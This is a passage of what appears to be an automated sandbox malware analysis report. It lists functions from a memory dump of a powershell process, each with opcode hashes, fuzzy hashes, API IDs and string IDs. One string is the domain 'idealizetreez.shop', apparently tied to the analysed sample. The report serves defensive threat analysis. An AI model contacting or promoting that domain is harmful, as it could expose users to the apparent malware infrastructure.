                                                                                              • Instruction Fuzzy Hash: 6541D270509780CBD7218F288C557EB77E1EFD2315F18492DD4C99B391EB784885CB9A
                                                                                              Function 00418345 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ;
                                                                                              • API String ID: 0-1661535913
                                                                                              • Opcode ID: c7cd7df4491fcb1d552612528dc55bf25fb60bfc141eaa6a07ba649ad674a69a
                                                                                              • Instruction ID: aac2a484ca8ba18e51aa294b3c7f37b475decf7f56138790a10de276ea173716
                                                                                              • Opcode Fuzzy Hash: c7cd7df4491fcb1d552612528dc55bf25fb60bfc141eaa6a07ba649ad674a69a
                                                                                              • Instruction Fuzzy Hash: C041CF70509780CBD7218F2888557EBB7E1EFD2315F184A5ED0C99F391EB784885CBAA
                                                                                              Function 004409B0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: @
                                                                                              • API String ID: 2994545307-2766056989
                                                                                              • Opcode ID: 356b7bd3d194ee5f94960d2b9e984323d94642e08619092bb6a0b73fe4a0898a
                                                                                              • Instruction ID: 76b5197cebf94b635e8c0a4602c423330ea3b0d3bdd9b94c594c9dd0906d943f
                                                                                              • Opcode Fuzzy Hash: 356b7bd3d194ee5f94960d2b9e984323d94642e08619092bb6a0b73fe4a0898a
                                                                                              • Instruction Fuzzy Hash: 372104714043049BE324DF18D8C166BB7F4FFD5324F149A2DEAA8173D0D37599188B9A
                                                                                              Function 0040A019 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: idealizetreez.shop
                                                                                              • API String ID: 0-960959398
                                                                                              • Opcode ID: 0c4a43498d3a6f9a267e5ecdc1208369b64117cc19c83a8f64aaed3f267798c7
                                                                                              • Instruction ID: 85642bf36951d9d03c0ab55b54bf8aad6ac5540dc0352e837432c302b3dde656
                                                                                              • Opcode Fuzzy Hash: 0c4a43498d3a6f9a267e5ecdc1208369b64117cc19c83a8f64aaed3f267798c7
                                                                                              • Instruction Fuzzy Hash: 24E092789102098BC704CF58C861377B3B0EF4B344B045066D543E7360E3389D10D76C
                                                                                              Function 0040A776 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: kU>
                                                                                              • API String ID: 0-4078320540
                                                                                              • Opcode ID: cd9e409925e9ddd7619a88cd2e6ba5700926da017e3db5a7b9f5dcbbde196b2d
                                                                                              • Instruction ID: 5071b8b87247db8cec7c880a8237e98b129d779ce3430f61a8b2f01dbb56df35
                                                                                              • Opcode Fuzzy Hash: cd9e409925e9ddd7619a88cd2e6ba5700926da017e3db5a7b9f5dcbbde196b2d
                                                                                              • Instruction Fuzzy Hash: DAC09B7C9484405B990CCF10DC51575B337D7C7704B14F12AC50113616D530D417460C
                                                                                              Function 0043FDC0 Relevance: .8, Instructions: 754COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 87b473beaffeef4c40d60f21e7638e7426794247a923b4019337b52f13f58765
                                                                                              • Instruction ID: 6d94452296d6fdc2322903269cfeb980d9f692429726a0f131028fe64d2134ec
                                                                                              • Opcode Fuzzy Hash: 87b473beaffeef4c40d60f21e7638e7426794247a923b4019337b52f13f58765
                                                                                              • Instruction Fuzzy Hash: DB22493A608315CFDB08DF28E89126BB7E1FB8E310F0A487ED98697350D6759D41DB45
                                                                                              Function 004072E0 Relevance: .7, Instructions: 671COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8cd1ad1751e473ed44838d36502399095b82e4fe344afcdb69c1c8a72c8faa4e
                                                                                              • Instruction ID: 2400bfd85292c6d8f78ff9fe5d7a8aa1de9ab2df71bc1fd9c32ba1933c5cbb71
                                                                                              • Opcode Fuzzy Hash: 8cd1ad1751e473ed44838d36502399095b82e4fe344afcdb69c1c8a72c8faa4e
                                                                                              • Instruction Fuzzy Hash: C622A771A0C3118BD725DF18E9816ABB3E1EFC0318F29493EC98697381D638B955CB97
                                                                                              Function 0043FF20 Relevance: .7, Instructions: 660COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7f9ba0287d18e61fbb0bbeffa2f8e005a31575dd265e395b3471dffd9e44a665
                                                                                              • Instruction ID: 19e46a197fe5dc9a7d8f8631aa607c49c539d9a0359e1bfbb485e67ee65fa345
                                                                                              • Opcode Fuzzy Hash: 7f9ba0287d18e61fbb0bbeffa2f8e005a31575dd265e395b3471dffd9e44a665
                                                                                              • Instruction Fuzzy Hash: 3312263A718315CFD708DF68E8A126BB7E1FB8A310F0A887DD98687390D6759C41DB85
                                                                                              Function 0041BAD2 Relevance: .6, Instructions: 622COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a9f817d02abb724da0acc94afa822e38040c36675c8d2d2b4ec94f946ce1f18
                                                                                              • Instruction ID: 6b47ffb1301be708b3972a1f3db400276ea5c6c269917a7f1f31ca504a32af70
                                                                                              • Opcode Fuzzy Hash: 1a9f817d02abb724da0acc94afa822e38040c36675c8d2d2b4ec94f946ce1f18
                                                                                              • Instruction Fuzzy Hash: 76F123B19083108AD714DF24C8917ABB7E2EFD4314F09CA2DE8C95B395E7B89985C7C6
                                                                                              Function 0042A896 Relevance: .4, Instructions: 356COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aef97a6ed2adcc5c194102f85a0b3b88384dab430218433400a55295ab3d1c5d
                                                                                              • Instruction ID: b0d9536f3b758035a62fd9c42ec51039dfb65089aaf20f9a267826a42f707275
                                                                                              • Opcode Fuzzy Hash: aef97a6ed2adcc5c194102f85a0b3b88384dab430218433400a55295ab3d1c5d
                                                                                              • Instruction Fuzzy Hash: 96C12B71E04151CFCB10CF68E8406AEFBB1FF5A310F594299E890AB392D7359D81CB96
                                                                                              Function 00408100 Relevance: .3, Instructions: 338COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ec939b728de32cd065ac2583c22c2f3d52e0b6e3766d9de2a71eedc5642e8e23
                                                                                              • Instruction ID: e24ab20cf3e39d220cf40b581df5088d98799575b3e8d87a4990354f2383bf3f
                                                                                              • Opcode Fuzzy Hash: ec939b728de32cd065ac2583c22c2f3d52e0b6e3766d9de2a71eedc5642e8e23
                                                                                              • Instruction Fuzzy Hash: A3B10E71A083514BC718CE29C99016BB7D2ABC5710F194A3EE8D6E73D1EA3DDD068B89
                                                                                              Function 00440DF0 Relevance: .3, Instructions: 271COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6a36bee29e61375b3882374d37c1277df9b4d218f1368ddf6a937359fda31d0
                                                                                              • Instruction ID: c87eeb10add880ce72528987086ed9914a9d38bcc1c8f776b78a9973119e30e1
                                                                                              • Opcode Fuzzy Hash: d6a36bee29e61375b3882374d37c1277df9b4d218f1368ddf6a937359fda31d0
                                                                                              • Instruction Fuzzy Hash: 58912836A043119BE724DF18C880A6BB3B2FFC8710F15862DE9955B3A1D735EC91CB85
                                                                                              Function 0043DE30 Relevance: .2, Instructions: 214COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 62e319a4b52f851d7f65c04bbfc300649784219b9ad6074ad6226cf62d5ad1ff
                                                                                              • Instruction ID: a85ac73ac2c5c7a49269f2e5ad9fc92488733c06880b11bf0235fb8d685aa348
                                                                                              • Opcode Fuzzy Hash: 62e319a4b52f851d7f65c04bbfc300649784219b9ad6074ad6226cf62d5ad1ff
                                                                                              • Instruction Fuzzy Hash: 2481D531A0D3918FC319CF29C49062EBBE2AFD9314F19866EE4D58B392D739D841CB56
                                                                                              Function 00402220 Relevance: .2, Instructions: 166COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 873c5cd189da3d114d0fd207706a67cb597bfd23c6bc4a413dfd13c48ef79fde
                                                                                              • Instruction ID: 1c30bb2cb68758b8a9303c3a6f3cada3ef225b3c8c9fac940c750b9b8ca20d97
                                                                                              • Opcode Fuzzy Hash: 873c5cd189da3d114d0fd207706a67cb597bfd23c6bc4a413dfd13c48ef79fde
                                                                                              • Instruction Fuzzy Hash: 5051A6B18007059BD3209F38AD49717B7A4BB42328F14073DED69A73D1E378D965CB8A
                                                                                              Function 0042A428 Relevance: .2, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30cf399869b6cdb58c13ba095348baf3f7998d842ec4c46c21b08d82adb47cde
                                                                                              • Instruction ID: ccacc9acd7f709eb8bbce252dfed750450a75ba51fbed4e149348260ad930598
                                                                                              • Opcode Fuzzy Hash: 30cf399869b6cdb58c13ba095348baf3f7998d842ec4c46c21b08d82adb47cde
                                                                                              • Instruction Fuzzy Hash: 6241CC39F442608BD710CF24E8852BAB7A2BF8B304F1D857AD88597341C67CA812C395
                                                                                              Function 0042A2F3 Relevance: .1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96552dec850eba5b07e712eed56ea61786e443ba0089acc2e50d138459c8b7f5
                                                                                              • Instruction ID: 47f53cdc0930b4034cc738d143e30d253e889f7c5d127bd38edcc8a9eab44a32
                                                                                              • Opcode Fuzzy Hash: 96552dec850eba5b07e712eed56ea61786e443ba0089acc2e50d138459c8b7f5
                                                                                              • Instruction Fuzzy Hash: 3131D235F502248BC714CF99D8C17AFB7F2BF86304F588429C8A5EB341C7B8A8068B95
                                                                                              Function 00429A8C Relevance: .1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53cbbfec33682c4e32b9dc01f360dff73ce8b43803ffaaf5c548a946c5ae285c
                                                                                              • Instruction ID: 10b6e05a739801110dfb33a09fef250bb44503c103828f3939f9832479bc2a9d
                                                                                              • Opcode Fuzzy Hash: 53cbbfec33682c4e32b9dc01f360dff73ce8b43803ffaaf5c548a946c5ae285c
                                                                                              • Instruction Fuzzy Hash: 8821BAB8B18210CBDB58AF14FC41536337AFB87315F64593AE506022B2E334AC21AB0E
                                                                                              Function 00437840 Relevance: .1, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction ID: 7d562ef817213846b374677ea8531c6f5fba9023c92ac06c26051134dca4d998
                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                              • Instruction Fuzzy Hash: 8811E973B091D50EC32A9D3C8404565BFA30A97234F1953EAF4F89B2D2D6268D8EC359
                                                                                              Function 0042ADA0 Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aa87da02a4decc1843fc8535b02c35876b165c0fc05e725b8d7fb35cef763b81
                                                                                              • Instruction ID: ba3370f889e109d8438142a28fbf197b9368e79a0fff92380531bd0eed21cab2
                                                                                              • Opcode Fuzzy Hash: aa87da02a4decc1843fc8535b02c35876b165c0fc05e725b8d7fb35cef763b81
                                                                                              • Instruction Fuzzy Hash: D4019EF1B0032247DA209E11A4C072BB2A96F94708F88083EEC05A7746DB7DFC25C29B
                                                                                              Function 0043D4C0 Relevance: .0, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 5699edb6a8b6ac0eab34979e0c9e8b5b5b753bd8fa838356c6be2d66694c0621
                                                                                              • Instruction ID: 6e3c2a43fe33b2e2a914b42a14f7fc17b8ddef0cb09444c173f06e41b8a818e2
                                                                                              • Opcode Fuzzy Hash: 5699edb6a8b6ac0eab34979e0c9e8b5b5b753bd8fa838356c6be2d66694c0621
                                                                                              • Instruction Fuzzy Hash: D3F0D176900208BB82108E05BC40D3777AEEBCE72CF10232AE518132A1E236ED2197A9
                                                                                              Function 0042E76A Relevance: .0, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dcc45faf77b321abdf1be2aa39c97a579a6514b290957eae9be06304f116a880
                                                                                              • Instruction ID: e29ff063b4819737cdced7d84c17c3bc4a838b52320fbe10ec9db0d595941b6c
                                                                                              • Opcode Fuzzy Hash: dcc45faf77b321abdf1be2aa39c97a579a6514b290957eae9be06304f116a880
                                                                                              • Instruction Fuzzy Hash: ABF05B3A58D3E346D3254F355070721FFD15B97250B5D17DEC8D02B382D65A1C4697D8
                                                                                              Function 0042F4D9 Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 135bd571374f07c36c895e6f1a2899fbc2b6d75936990ab008954106d067a72f
                                                                                              • Instruction ID: 468d01e0e2a5a0b3c76648ee75cf0a8788d6a099748a2122b3a29ad34929a1cd
                                                                                              • Opcode Fuzzy Hash: 135bd571374f07c36c895e6f1a2899fbc2b6d75936990ab008954106d067a72f
                                                                                              • Instruction Fuzzy Hash: 2801B1716082918BC718CF29C55556FBBE6EF9A208F14592DF093AB281C638850B879A
                                                                                              Function 0043F625 Relevance: .0, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab83e2e2eccb8cd92d372264d2dcf73246d1a3ac2aa9f976fd6c6ce2401f8fab
                                                                                              • Instruction ID: 441bdc36a534b87bd052b25b03cbfa734e87cfd3ab19d5ae7b5a54afb5009103
                                                                                              • Opcode Fuzzy Hash: ab83e2e2eccb8cd92d372264d2dcf73246d1a3ac2aa9f976fd6c6ce2401f8fab
                                                                                              • Instruction Fuzzy Hash: F5F082357496508FD308AE68D49062FB3B3BBDA210F1D953DC18213785C278AC12874A
                                                                                              Function 0041ED60 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                              • Instruction ID: d72b12d140c42370c98630e8a3fb11d29d6787cdaf45168881cac5aa1c5ae432
                                                                                              • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                              • Instruction Fuzzy Hash: D7D097709487B20E47088E3810A08B7FBE8E943212B08148FE8C1E3205C224DC02429C
                                                                                              Function 0043FBEC Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 765574f38b704ee41fb12a1e7e2f10b7a806452d4f9c358b9b530fd469f03acb
                                                                                              • Instruction ID: 98c45bbe0c0fa2650c3db5d2544adc09e2f328a2bfbc69391efc47f62d975c85
                                                                                              • Opcode Fuzzy Hash: 765574f38b704ee41fb12a1e7e2f10b7a806452d4f9c358b9b530fd469f03acb
                                                                                              • Instruction Fuzzy Hash: 56C08C2DF981908B8308CFA0DCA05367267E78B304B28B03CC802A3300EA709802914C
                                                                                              Function 0043FC25 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2df998116a766f4f8fe7ef7ffbdf71bd2b7e9eebf572098875581f0018f6afe3
                                                                                              • Instruction ID: 3796a7f1b18e53123d337db3c14a1edf25da093f15f3a207c4c8903e0a38d60b
                                                                                              • Opcode Fuzzy Hash: 2df998116a766f4f8fe7ef7ffbdf71bd2b7e9eebf572098875581f0018f6afe3
                                                                                              • Instruction Fuzzy Hash: C4C09B2DE5819047D20CCF15DC91575B277E7CB714B28712CC45563355DA709802454C
                                                                                              Function 004299F3 Relevance: .0, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d01e2c09e8333d36a3e9930c58a145cca16619b4df991e4d07ada21a6106c6f
                                                                                              • Instruction ID: 9110b56ff03209b6f12ff97f4b329b393d69ed718bb44ca82c7fe46052a8b0dd
                                                                                              • Opcode Fuzzy Hash: 6d01e2c09e8333d36a3e9930c58a145cca16619b4df991e4d07ada21a6106c6f
                                                                                              • Instruction Fuzzy Hash: E0B092E9C080058AD0902B117D02526B0280653248F042836EC0F3224BA92AF158405F
                                                                                              Function 00429A63 Relevance: .0, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f1b94820a00e9b4d67fc5c46f2b2491afc3af782dac714d690d76cbd379235f
                                                                                              • Instruction ID: edc22c53471936d79557123a78fbcf6a00896c6993a503f72555de89521df72a
                                                                                              • Opcode Fuzzy Hash: 1f1b94820a00e9b4d67fc5c46f2b2491afc3af782dac714d690d76cbd379235f
                                                                                              • Instruction Fuzzy Hash: 3CB092E9D0800287D1552B113C4243AB0350AD3648F05283EE8063224AAA2AF19A505F
                                                                                              Function 00429A23 Relevance: .0, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b605b06bfe88132135b69da41ebb62ef5cd005d42265421a378328e92d9a1a04
                                                                                              • Instruction ID: 7bb6fbd17d85ff18cdbd93c2cc5ec81a822ac412ba8ff389081f8229be9402ec
                                                                                              • Opcode Fuzzy Hash: b605b06bfe88132135b69da41ebb62ef5cd005d42265421a378328e92d9a1a04
                                                                                              • Instruction Fuzzy Hash: 5BB09BE5D4C10157D5415F11BC03425B1745B9735CF142835F40973177EA25F554454F
                                                                                              Function 0043EFE1 Relevance: .0, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7954c48760364a5f8b21c05f157e938d745ba6747fac7d66ba54525c1330317b
                                                                                              • Instruction ID: 66bce38cfb3529a451a0ef7db8256d7502181127e43dfdf839edbb52e44d99c4
                                                                                              • Opcode Fuzzy Hash: 7954c48760364a5f8b21c05f157e938d745ba6747fac7d66ba54525c1330317b
                                                                                              • Instruction Fuzzy Hash: A7C04C7C649240AF8244CF14F961436B2B5E747705F14742DE05AF3251DA30E4028B0C
                                                                                              Function 00435FDB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$DeleteMetricsSelectSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3911056724-3916222277
                                                                                              • Opcode ID: 170c04faa20cb243a68c7458b585eadbbc4e00cd524e8e36276ae9a93afe84e3
                                                                                              • Instruction ID: 364d0384431ba28af6b61bb84e025a161b1a9fcfe2ca24dd3234f1d033ef66e5
                                                                                              • Opcode Fuzzy Hash: 170c04faa20cb243a68c7458b585eadbbc4e00cd524e8e36276ae9a93afe84e3
                                                                                              • Instruction Fuzzy Hash: 0E419DB59143149FDB00EFACE98965DBBF0BB49705F01852EE888E7350D774AA48CF86
                                                                                              Function 0042DEA8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
